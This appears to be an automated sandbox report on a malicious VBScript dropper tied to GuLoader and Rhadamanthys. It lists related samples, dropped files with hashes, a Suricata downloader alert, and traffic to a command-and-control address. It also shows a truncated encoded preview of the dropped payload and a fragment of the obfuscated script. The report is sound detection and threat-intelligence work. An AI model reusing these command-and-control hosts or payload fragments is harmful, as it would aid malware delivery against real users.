                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:13
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:0iTxQouy7k.vbs
                                                        renamed because original name is a hash value
                                                        Original Sample Name:9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.expl.evad.winVBS@13/9@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 25%
                                                        HCA Information:
                                                        • Successful, ratio: 68%
                                                        • Number of executed functions: 57
                                                        • Number of non-executed functions: 17
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.54.80.26, 23.54.80.57, 23.32.238.18, 23.32.238.74, 4.245.163.56, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                        • Execution Graph export aborted for target msiexec.exe, PID 5948 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 4948 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 5752 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        06:47:20API Interceptor1x Sleep call for process: wscript.exe modified
                                                        06:47:21API Interceptor1x Sleep call for process: WMIC.exe modified
                                                        06:47:28API Interceptor87x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        45.149.241.141List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                    202.71.109.228List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                            List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                DOC-MARIANO _ 21ST_JUNE_2022 _.HTMGet hashmaliciousHTMLPhisherBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TMVADS-APTM-VADSDCHostingMYList of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  bin.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 202.75.62.165
                                                                                  OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 202.71.109.165
                                                                                  K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                  • 112.137.173.77
                                                                                  XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 112.137.173.77
                                                                                  UUNETUSmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 62.22.186.203
                                                                                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 63.11.152.106
                                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 108.5.239.250
                                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 108.39.235.151
                                                                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 173.74.165.171
                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                  • 193.133.159.199
                                                                                  arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 209.205.60.100
                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 141.157.175.202
                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 141.150.58.106
                                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                                  • 63.61.1.157

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                  • 202.71.109.228
                                                                                  8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                  • 202.71.109.228
                                                                                  v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 202.71.109.228
                                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 202.71.109.228
                                                                                  37f463bf4616ecd445d4a1937da06e19tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 202.71.109.228
                                                                                  Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  • 202.71.109.228
                                                                                  iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 202.71.109.228
                                                                                  script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                  • 202.71.109.228
                                                                                  66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 202.71.109.228
                                                                                  pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                  • 202.71.109.228

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.150184159866505
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKP1F9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:H1sDnLNkPlE99SNxAhUe/3
                                                                                  MD5:7FE64321DBA7A3596DB4C985C2FE16B3
                                                                                  SHA1:A4E0A861F7BC6F1AD4F34929F6B30B5446D3DB2A
                                                                                  SHA-256:D377517AABD9811A10F2EB79630A5C99A4181C601F4791ECDC9F869BB5AAFA01
                                                                                  SHA-512:5B348A802CDE63355B48E3A5914FB20D8A9ACBAB5D5426219D018D31D2D9E740C3C5A6DE8A81220B89ACBFDD1C4E358598D89841A1109CFAD5096A627D3B32F2
                                                                                  Malicious:false
                                                                                  Preview:p...... .............R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):8003
                                                                                  Entropy (8bit):4.840877972214509
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ck4qwtkl.ii3.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpu3fn4w.zsa.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlmtfj0n.yae.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wumdthnd.22i.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Roaming\Enspndervognes.Eks

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):460072
                                                                                  Entropy (8bit):5.950484631270394
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/J+c9uX7LLu+6mxcsxJ2zdcd8dbQCZmdLdQ:/ECuqsceR8fId5Q
                                                                                  MD5:FB688B596A84DBDCE61BE3407F21BEA9
                                                                                  SHA1:5CB27E17C021D339226DEAA2A830673FB5293002
                                                                                  SHA-256:8385BE5F7DF86C3698DB784BEFC1C55A569CF5511F3CBFE02FBF6A64330E759A
                                                                                  SHA-512:64FE743A3950B9ECB4F26C7921F07D4FD58FD675EC6E8A1809B9A97E3E1740DF25C32CC7319D0CCE9E72B2F19DC1B8718CB9889D7AE0E9DD2A42E2C3F52C9B4D
                                                                                  Malicious:false
                                                                                  Preview:cQGb6wKzHrunkQsAcQGbcQGbA1wkBHEBm+sCKOq5D95xe3EBm+sCi2eBwUpbo+XrAu3dcQGbgelZORVh6wJlm+sCYrzrApd2cQGbul3RUkpxAZvrAos7cQGbcQGbMcrrAiq+6wJbT4kUC3EBm3EBm9Hi6wLQfXEBm4PBBHEBm3EBm4H5GSHXAXzNcQGb6wL8wYtEJARxAZtxAZuJw3EBm+sCYpaBwwf8VADrArbtcQGbuq4dXYPrAjlpcQGbgfJjXSytcQGbcQGbgfLNQHEucQGbcQGb6wK+cXEBm3EBm3EBm4sMEOsCAz5xAZuJDBNxAZvrAvWgQusC8fLrApp5gfr02wQAddVxAZtxAZuJXCQMcQGb6wIw64HtAAMAAOsC0ZXrAhzKi1QkCOsCGPlxAZuLfCQE6wLCAusCfBWJ6+sCBTLrApV3gcOcAAAAcQGb6wI5AVPrAl+ecQGbakBxAZvrAqRlietxAZvrAiHmx4MAAQAAAMDlAXEBm3EBm4HDAAEAAHEBm3EBm1PrAsArcQGbietxAZvrAlUUibsEAQAAcQGbcQGbgcMEAQAAcQGb6wKEVFNxAZvrAmhOav9xAZtxAZuDwgVxAZtxAZsx9usCuJXrAoeRMclxAZtxAZuLGusC5RJxAZtBcQGbcQGbORwKdfRxAZtxAZtG6wKWrXEBm4B8Cvu4dd/rAh2XcQGbi0QK/HEBm+sCvC4p8HEBm+sCf33/0nEBm3EBm7r02wQAcQGbcQGbMcBxAZtxAZuLfCQMcQGb6wIPuYE0BxUsR9zrAoN06wLGT4PABOsC39nrAlc5OdB14usCY61xAZuJ+3EBm3EBm//X6wJaQusC51H9KUfcFRFaqkhFwx9OSrAbF1zOOdKpHCPq09atse/GWU7TuCNb4Zk/lIEcI+rTly9AJMZZTtO4I+SblbxZ08qH6tO4qeJ5zjmsNjEEtq22qInZNl3kX7hckK222QCBEFjyrLs10mhK3MldQKdz

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with CRLF line terminators
                                                                                  Entropy (8bit):5.238788178589363
                                                                                  TrID:
                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                  File name:0iTxQouy7k.vbs
                                                                                  File size:29'892 bytes
                                                                                  MD5:3641d1c1daf325ca23298e285dc44693
                                                                                  SHA1:ac8cd1a18de887698bdd2301fccfcff0202bbcb0
                                                                                  SHA256:9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a
                                                                                  SHA512:b38ffa684e92c889f11330c17e674267651a3f87183cd5322521f172cfa5d6606146030099ac296be281e1e1b6b5afef6e290b5b62b4cc70cf3b9847232a33fe
                                                                                  SSDEEP:384:G7PvIgoZWCdKpGYWucVemKdFkDmn+ZwN/hAi4y5Pa:iPvIgoZJE9WdeV/kDm+Zw3a
                                                                                  TLSH:3ED24B69983320466647B2D1F53E38A5A59101F39622E0F42CC86FDD068DA5CF7FBC7A
                                                                                  File Content Preview:......Spildevandsbekendt = Right("Epikuriske",191)........Strategdomestiskehammo = Strategdomestiskehammo & "Skandinaviseringerne" & "Undervalue" ........'Plasmodiocarpous nonapparitional irgrnnes? microphonograph;..'Braktuds clasper stvnene....Set Austra

                                                                                  File Icon

                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-19T12:48:02.247816+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449738202.71.109.228443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 19, 2024 12:47:30.765584946 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:30.765652895 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:30.765734911 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:30.773017883 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:30.773046970 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:32.474841118 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:32.474983931 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:32.480223894 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:32.480242014 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:32.480494022 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:32.510917902 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:32.555334091 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.296360016 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.296390057 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.296399117 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.296452999 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.296478033 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.336803913 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.518780947 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.518790007 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.518870115 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.533727884 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.533739090 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.533826113 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.550714970 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.550729990 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.550796032 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.567581892 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.567589998 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.567667007 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.751101971 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.751508951 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.761622906 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.761806011 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.780455112 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.780806065 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.794859886 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.795036077 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.809026003 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.809114933 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.827860117 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.828228951 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.841996908 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.842133045 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.856375933 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.856731892 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.982928038 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.983336926 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:33.990372896 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:33.990519047 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.002850056 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.003266096 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.012034893 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.012221098 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.021560907 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.021740913 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.030997992 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.031104088 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.043162107 CET44349731202.71.109.228192.168.2.4
